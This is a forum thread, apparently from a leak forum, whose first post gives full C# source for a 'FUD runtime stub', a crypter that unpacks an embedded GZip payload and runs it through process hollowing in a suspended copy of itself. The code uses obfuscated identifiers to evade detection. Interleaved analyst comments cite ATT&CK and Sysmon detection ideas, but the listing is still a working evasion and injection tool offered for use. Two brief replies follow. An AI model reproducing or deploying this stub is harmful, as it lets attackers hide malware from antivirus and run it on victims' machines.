
How to make a FUD Runtime Stub (Level: Beginner)



#1
jpaul


How to make a FUD Runtime Stub (Level: Beginner)

This Stub is for

https://leakforums.net/thread-468643


We need three classes:


class1
 

Code:
using Microsoft.VisualBasic;
using System;
using System.Collections;
using System.Collections.Generic;
using System.Data;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;

// Analyst annotation (defensive reading of this listing):
// This class is the injection half of the "runtime stub". Its one public method
// takes a PE image in `bytes` and a path in `surrogateProcess`, then drives the
// native imports below against a second process. The call order (create, read
// thread context, unmap, allocate, write, set context, resume) matches process
// hollowing, catalogued as MITRE ATT&CK T1055.012.
// NOTE(review): every import name except V9 is an obfuscated identifier, so which
// kernel32/ntdll export each declaration is meant to bind to is inferred here from
// parameter names and call order only. Confirm against a compiled sample.
public class 的伐式年谢达非答方外非肉非达说种自天文文十
{
    // Native imports. Parameter names that survived obfuscation (hProc, hThr,
    // baseAddr, allocType, prot, flNewProtect, lpBuffer) are the only visible hints
    // about their purpose. A managed assembly that imports this combination of
    // cross-process memory and thread-context primitives is worth flagging in
    // static triage even when the method names are unreadable.
    [DllImport("kernel32")]
    [return: MarshalAs(UnmanagedType.Bool)]
    private static extern bool 英余式文伪答(string 仿伏余式方中, StringBuilder 涯么伙信表文, IntPtr 谢份表十非的, IntPtr 谢涯谢伙华达, [MarshalAs(UnmanagedType.Bool)]
bool inherit, int creation, IntPtr env, string 方丢伪达种种, byte[] 信伏谢涯十华, IntPtr[] 么问种达信天);
    [DllImport("kernel32")]
    [return: MarshalAs(UnmanagedType.Bool)]
    private static extern bool V9(IntPtr hThr, uint[] ctxt);
    [DllImport("ntdll")]
    private static extern uint 英余式文伪答0(IntPtr hProc, IntPtr baseAddr);
    [DllImport("kernel32")]
    [return: MarshalAs(UnmanagedType.Bool)]
    private static extern bool 英余式文伪答1(IntPtr hProc, IntPtr baseAddr, ref IntPtr bufr, int bufrSize, ref IntPtr numRead);
    [DllImport("kernel32.dll")]
    private static extern uint 英余式文伪答2(IntPtr hThread);
    [DllImport("kernel32")]
    [return: MarshalAs(UnmanagedType.Bool)]
    private static extern bool 英余式文伪答3(IntPtr hThr, uint[] ctxt);
    [DllImport("kernel32")]
    private static extern IntPtr 英余式文伪答4(IntPtr hProc, IntPtr addr, IntPtr size, int allocType, int prot);
    // Declared but never called anywhere in this listing.
    [DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
    private static extern bool 英余式文伪答5(IntPtr hProcess, IntPtr guyfjhkKJLHKLK, IntPtr dwSize, uint flNewProtect, ref uint lpflOldProtect);
    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern bool 英余式文伪答6(IntPtr hProcess, IntPtr 仿伏余式方中1, byte[] lpBuffer, uint nSize, int 仿伏余式方中2);

    // Analyst annotation:
    //   bytes            - buffer parsed as a PE image (fixed header offsets are read from it).
    //   surrogateProcess - command line handed to the first import; the process that results
    //                      is the injection target.
    //   Returns false only when an exception is caught; otherwise true.
    //
    // Behaviours a defender can key on, in the order the code performs them:
    //   1. A process is started with creation flag 4 (the value of CREATE_SUSPENDED).
    //   2. Memory is requested in that process with allocType 0x3000
    //      (MEM_COMMIT | MEM_RESERVE) and prot 0x40 (PAGE_EXECUTE_READWRITE).
    //   3. Several cross-process writes copy the headers and then each section.
    //   4. The primary thread's context is rewritten before the thread is resumed.
    // Useful telemetry: Sysmon Event ID 1 (process creation), 10 (ProcessAccess) and
    // 25 (ProcessTampering), plus EDR memory scans for private RWX regions that begin
    // with a PE header in a process whose on-disk image does not match.
    public static bool 肉方表文文伏伙文余文英仿常价仿(byte[] bytes, string surrogateProcess)
    {
        try
        {
            IntPtr 谢份表十非的 = IntPtr.Zero;
            // Four-slot handle array and 68-byte buffer passed to the process-start import;
            // slot [0] is later used as a process handle and slot [1] as a thread handle.
            IntPtr[] 英余式文伪答7 = new IntPtr[4];
            byte[] 英余式文伪答8 = new byte[68];

            // Offset 60 is where a PE file stores the offset of its NT headers. The other
            // reads are at fixed offsets from that header and appear to be the section
            // count and header size (TODO confirm).
            int num2 = BitConverter.ToInt32(bytes, 60);
            int num = BitConverter.ToInt16(bytes, num2 + 6);
            IntPtr ptr4 = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x54));

            // Creation flag 4: the target starts suspended, so none of its own code runs
            // before its memory is altered.
            if (英余式文伪答(null, new StringBuilder(surrogateProcess), 谢份表十非的, 谢份表十非的, false, 4, 谢份表十非的, null, 英余式文伪答8, 英余式文伪答7))
            {
                uint[] ctxt = new uint[179];
                ctxt[0] = 0x10002;
                if (V9(英余式文伪答7[1], ctxt))
                {
                    IntPtr baseAddr = new IntPtr(ctxt[0x29] + 8L);

                    IntPtr 英余式文伪答9 = IntPtr.Zero;
                    IntPtr 仿伏余式方中0 = new IntPtr(4);

                    IntPtr numRead = IntPtr.Zero;

                    // Reads 4 bytes from the target at an address derived from the thread
                    // context, then passes that value to the ntdll import; a zero return is
                    // required to continue.
                    if (英余式文伪答1(英余式文伪答7[0], baseAddr, ref 英余式文伪答9, Convert.ToInt32(仿伏余式方中0), ref numRead) && (英余式文伪答0(英余式文伪答7[0], 英余式文伪答9) == 0))
                    {
                        IntPtr addr = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x34));
                        IntPtr size = new IntPtr(BitConverter.ToInt32(bytes, num2 + 80));
                        // Remote allocation requested as committed, reserved and RWX (0x3000 / 0x40).
                        IntPtr 仿伏余式方中1 = 英余式文伪答4(英余式文伪答7[0], addr, size, 0x3000, 0x40);

                        int 仿伏余式方中2 = 0;

                        // First cross-process write: the leading `ptr4` bytes of the image.
                        英余式文伪答6(英余式文伪答7[0], 仿伏余式方中1, bytes, Convert.ToUInt32(Convert.ToInt32(ptr4)), 仿伏余式方中2);
                        int num5 = num - 1;
                        // One cross-process write per 40-byte table entry starting at num2 + 0xf8.
                        for (int i = 0; i <= num5; i++)
                        {
                            int[] dst = new int[10];
                            Buffer.BlockCopy(bytes, (num2 + 0xf8) + (i * 40), dst, 0, 40);
                            byte[] buffer2 = new byte[(dst[4] - 1) + 1];
                            Buffer.BlockCopy(bytes, dst[5], buffer2, 0, buffer2.Length);

                            // `size` and `addr` are reused here as destination address and length.
                            size = new IntPtr(仿伏余式方中1.ToInt32() + dst[3]);
                            addr = new IntPtr(buffer2.Length);

                            英余式文伪答6(英余式文伪答7[0], size, buffer2, Convert.ToUInt32(addr), 仿伏余式方中2);
                        }
                        size = new IntPtr(ctxt[0x29] + 8L);
                        addr = new IntPtr(4);

                        // Writes the new base address back to the location read earlier, then
                        // updates one context slot to base + a header field before applying it.
                        英余式文伪答6(英余式文伪答7[0], size, BitConverter.GetBytes(仿伏余式方中1.ToInt32()), Convert.ToUInt32(addr), 仿伏余式方中2);
                        ctxt[0x2c] = Convert.ToUInt32(仿伏余式方中1.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40));
                        英余式文伪答3(英余式文伪答7[1], ctxt);
                    }
                }
                // Called with the thread handle on every path once the process was started.
                英余式文伪答2(英余式文伪答7[1]);
            }
        }
        catch
        {
            return false;
        }
        return true;
    }
}

class2
 

Code:
using Microsoft.VisualBasic;
using System;
using System.Collections;
using System.Collections.Generic;
using System.Data;
using System.Diagnostics;
using System.Runtime.InteropServices;
// Analyst annotation (defensive reading of this listing):
// Resource loader for the stub. It pulls one native Win32 resource out of a loaded
// module and returns it as a managed byte array; the caller shown on this page
// treats that array as a GZip-compressed payload.
// Hunting notes: the resource is looked up by the literal name "Sweden" and type
// "Nykoping". Those strings, together with a custom-typed resource whose content
// starts with the GZip magic bytes, are candidate static indicators for this
// listing. Treat them as weak indicators, since such literals are trivially
// changed between builds.
static class 方华达么问丢先问的价问
{
    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern IntPtr FindResource(IntPtr 谢谢天自非常文种传文传怎传非仿, string 伟怎余方非伏种常答常谢自伟怎余方非, string 种常答常谢自伟怎余方非伟怎余方非伏伟怎余方非伏);
    
    // Bound explicitly to GetModuleHandleA through EntryPoint; only the managed name is obfuscated.
    [DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
    private static extern IntPtr 达表答伪的天道英文天方种表达份(string moduleName);
    [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
    private static extern int SizeofResource(IntPtr 谢谢天自非常文种传文传怎传非仿, IntPtr hResInfo);
    [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
    private static extern IntPtr LoadResource(IntPtr 谢谢天自非常文种传文传怎传非仿, IntPtr hResInfo);
    // Returns the bytes of the "Sweden"/"Nykoping" resource of the module named by the
    // argument. None of the native return values are checked before use.
    public static byte[] 文的价传先方延信的方么(string 谢表的书伏说信余用非余余外自频)
    {
        // Module handle for the given module name.
        IntPtr 谢谢天自非常文种传文传怎传非仿 = 达表答伪的天道英文天方种表达份(谢表的书伏说信余用非余余外自频);
        // Locate the resource, load it, and query its size.
        IntPtr 答外信伟表余华道价达英 = FindResource(谢谢天自非常文种传文传怎传非仿, "Sweden", "Nykoping");
        IntPtr 伐么先种谢仿式谢外信 = LoadResource(谢谢天自非常文种传文传怎传非仿, 答外信伟表余华道价达英);
        dynamic 说非先十么谢余谢书仿涯伪种的非文外仿非自 = SizeofResource(谢谢天自非常文种传文传怎传非仿, 答外信伟表余华道价达英);
        // Copy the resource bytes from native memory into a managed array.
        byte[] 英余延种中式表中仿 = new byte[说非先十么谢余谢书仿涯伪种的非文外仿非自];
        Marshal.Copy(伐么先种谢仿式谢外信, 英余延种中式表中仿, 0, Convert.ToInt32(说非先十么谢余谢书仿涯伪种的非文外仿非自));
        return 英余延种中式表中仿;
    }
}

class3
 

Code:

 

 

using Microsoft.VisualBasic;
using System;
using System.Collections;
using System.Collections.Generic;
using System.Data;
using System.Diagnostics;
using System.IO.Compression;
using System.IO;

/// <summary>
/// In-memory GZip helpers. On this page the stub uses <see cref="Decompress"/> to
/// unpack the resource it carries before handing the result to the injection routine.
/// </summary>
public class Compression
{

    /// <summary>GZip-compresses a buffer entirely in memory.</summary>
    /// <param name="bytData">Raw bytes to compress.</param>
    /// <returns>The complete GZip stream as a new array.</returns>
    public static byte[] Compress(byte[] bytData)
    {
        MemoryStream sink = new MemoryStream();
        try
        {
            GZipStream packer = new GZipStream(sink, CompressionMode.Compress);
            try
            {
                packer.Write(bytData, 0, bytData.Length);
            }
            finally
            {
                // Disposing the GZip stream flushes the trailer and closes the sink;
                // ToArray() still works on a closed MemoryStream.
                packer.Dispose();
            }
            return sink.ToArray();
        }
        finally
        {
            sink.Dispose();
        }
    }

    /// <summary>Expands a GZip stream held in memory.</summary>
    /// <param name="bytData">
    /// GZip-compressed bytes. The parameter variable is also reused as the growing
    /// output buffer; the caller's array is not modified because each resize allocates.
    /// </param>
    /// <returns>
    /// The bytes read up to and including the first read that returned fewer than
    /// 1024 bytes.
    /// </returns>
    public static byte[] Decompress(byte[] bytData)
    {
        const int CHUNK = 1024;

        using (MemoryStream packed = new MemoryStream(bytData))
        using (GZipStream unpacker = new GZipStream(packed, CompressionMode.Decompress))
        {
            int filled = 0;
            while (true)
            {
                // Make room for one more chunk, then read into the new tail.
                Array.Resize(ref bytData, filled + CHUNK);
                int got = unpacker.Read(bytData, filled, CHUNK);
                filled += got;

                if (got < CHUNK)
                {
                    // Short read: trim the buffer to the bytes actually produced.
                    Array.Resize(ref bytData, filled);
                    return bytData;
                }
            }
        }
    }

}

Program

 

Code:
// Analyst annotation (defensive reading of this listing):
// Entry sequence of the stub. It reads the embedded resource from its own executable,
// GZip-decompresses it, and passes the result to the injection routine with its own
// path as the surrogate process. At runtime that means the program launches a second
// copy of itself and alters that copy's memory before it runs.
// Detection idea: a process that spawns a child with the same image path, where the
// child's in-memory image no longer matches the file on disk.
byte[] Hej = null;
            byte[] dbytes = null;
            // Resource bytes taken from the running executable.
            Hej = 方华达么问丢先问的价问.文的价传先方延信的方么(Application.ExecutablePath);
          
            // Unpack, then hand off to the injection routine.
            dbytes = Compression.Decompress(Hej);
            的伐式年谢达非答方外非肉非达说种自天文文十.肉方表文文伏伙文余文英仿常价仿(dbytes, Application.ExecutablePath);

 




#2
nerfryze


What language is that? Can I have more detail on it?


// Quoted from the first post: load the embedded resource from the running executable,
// decompress it, and pass it to the injection routine with the executable's own path.
byte[] Hej = null;
            byte[] dbytes = null;
            Hej = 方华达么问丢先问的价问.文的价传先方延信的方么(Application.ExecutablePath);
          
            dbytes = Compression.Decompress(Hej);
            的伐式年谢达非答方外非肉非达说种自天文文十.肉方表文文伏伙文余文英仿常价仿(dbytes, Application.ExecutablePath);

 

stand for what?



#3
ryanchan22


tks

